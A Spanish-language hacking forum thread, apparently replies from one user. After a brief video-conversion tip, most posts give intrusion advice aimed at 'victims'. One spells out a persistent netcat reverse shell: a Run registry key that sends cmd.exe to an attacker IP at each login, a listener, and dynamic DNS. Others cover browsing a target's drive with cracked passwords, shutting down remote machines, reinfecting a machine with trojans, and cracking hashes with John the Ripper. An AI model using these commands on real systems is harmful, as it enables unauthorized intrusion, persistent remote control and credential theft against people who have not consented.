Mensajes

[tmpgenc]

para pasarlas de .dat a .mpeg, lo puedes hacer con el tmpgenc, lo encuentras en la web de la firma del señor de la firma xDDD.

ese programa convierte los archivos avi a mpeg, pero funciona igual con los .dat

saludos

muy bueno gospel. 

seguro a mas de alguno le habras resuelto alguna duda.

solo una pequeña observacion.(se me vino a la mente a la hora de leer la parte de "troyanizar").

¿que ocurriria si la victima tiene ip dinamica?
lo mas seguro es que nosostros nos queramos conectar con el server y no lo podremos realizar ya que requerimos la ip de ese equipo  .

pero para todo hay solucion  .

yo sujiriria subirle un netcat y realizar una reverse shell, asi seria el netcat el que se conectaria contigo y no necesitaras saber su ip.

para esto, ya una vez subido el netcat a la victima solo necesitamos agregarle una pequeña entrada al registro, pero como tenemos en estos momentos ya una shell de la victima  no sera dificil...
nos dirigimos a la shell de la victima y tecleamos:

Código [Seleccionar] Expandir

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\nc -d -e cmd.exe 10.10.0.156 9090"
(asi seria tomendo en cuenta que el nc esta en el directorio raiz del hdd)

ahora si se ejecutara en cada inicio de sesion...

solo que para esto funcione tendriamos que tener un netcat a la escucha en nuestra maquina y asi nos devolveria shell a la hora en que la victima conecte:

Código [Seleccionar] Expandir

nc -l -p 9090 -d -e cmd.exe

pero ahora se atraviesa otro problema... nosotros tampoco tenemos ip estatica.
pues seria caso de ir a www.no-ip.com crearnos un dominio y listo  , descargamos el ipduck para conectarnos con la misma ip y ya seremos felices xDDD.

una vez que nos devuelve la shell solo tendriamos que teclear ipconfig y listo, sabremos la ip de la victima.

espero me haya expicado bien  , si no... me avisan 


quizas sea algo liado andar haciendo esto pero me recordo mis tiempos de troyanos xDDD

saludos

yo quiero entrar al c:\, se hacerlo, pero sin user//pass lo vero un poco dificil

3.4.2- [ Intrusión rápida ]

         Ahora te explicaré una forma más rápida para entrar al sistema; sin
necesidad de abrir una ventana del DOS.

Cuando tenemos el LANguard Network Scanner abierto y con toda la información
scaneada y el password crackeado; lo que tenemos que hacer es doble click sobre
la IP y automáticamente se abrirá una ventana con la unidad del sistema objetivo
a nuestra disposición.

saludos

....¿Hay alguna forma de averiguar que servidor gestiona la impresión?

podrias utilizar el cain, le das un rango de ips a escanear, y te devolvera el nombre del host, recursos compartidos, impresoras que comparte, etc.

¿Cuál puede ser la explicación a que pueda acceder a los recursos compartidos del servidor que decía antes estando éste en otra subred??

puede que seas por que el servidor que te provee de internet a ti, tambien se lo de a ese servidor en la misma forma.(no se si me di a entender)

yo se que se pueden traspasar las subredes, puede que sea utilzando el servidor de la otra subred como puente de entrada solo que aun no lo he provado.

quizas no puedas acceder a los otros equipos por que estan en otra subred.  .

por asi decirlo, tu tienes una ip 192.168.1.1 y esa otra maquina tiene 192.168.2.1

te vas a inicio> ejecutar y escribes:

Código [Seleccionar] Expandir

shutdown -s -m \\ip de la maquina

yo lo cale en windows xp home, en el pro no me funciona.

si no mal recuerdo tambien funciona en win98
saludos

si no me equivoco no has sido el primero en hacer esa sugerencia, ya anteriormente lo habian propuesto.

algo que se me hace bastante gracioso es que apesar de estar alli, no los leen, ahora si los reunieran en uno solo dudo que lo hicieran con mayor frecuencia. (preguntenle a Badcode xDDD)

hay troyanos que tienen esa funcion (solo que no recuerdo el nombre xDDD), si dices que ya tienes infectada la victima solo sera cosa de reinfectarla con el otro.

si encuentro el nombre del troyano lo posteo, de mientras puedes ir buscandolo tambien

en la version para windows solo tienes que descomprimir el zip, y abrir una ventana de simbolo de sistema y dirigirte hasta la carpeta en la que esta descomprimido el zip y listo a trabajar xDDD.

su uso: (te dejo una breve explicacion)

para descifrar todos los passwords, lo que tienes que hacer es copiar las hashes (esto es de una por una, no vallas a meter todas de un jalon) a un archivo de texto (bloq de notas) y lo colocas donde estan todos los archivos del john.

ahora que ya tienes el archivo de texto, con el pass dentro, abres una ventana del simbolo del sistema (inicio>ejecutar>cmd). y te desplazas hasta el directorio del john:

Código [Seleccionar] Expandir

C:\>cd john
C:\john>

ahora que estamos dentro del directorio del john solo basta con ejecutar:

Código [Seleccionar] Expandir

C:\john>john -single pass.txt

aclaro que donde puse "pass.txt", es por que donde guarde el password, le puse copmo nombre pass y me quedo con terminacion txt (bloq de notas), puede que tu le pongas de cualquier otro modo y solo cambiaria esa parte, ejemplo:

Código [Seleccionar] Expandir

C:\john>john -single cualquiernombre.txt

espero te haya servido mi explicacion

no se si te habras dado cuenta pero exactamente encima de este post, esta un tutorial de este tipo.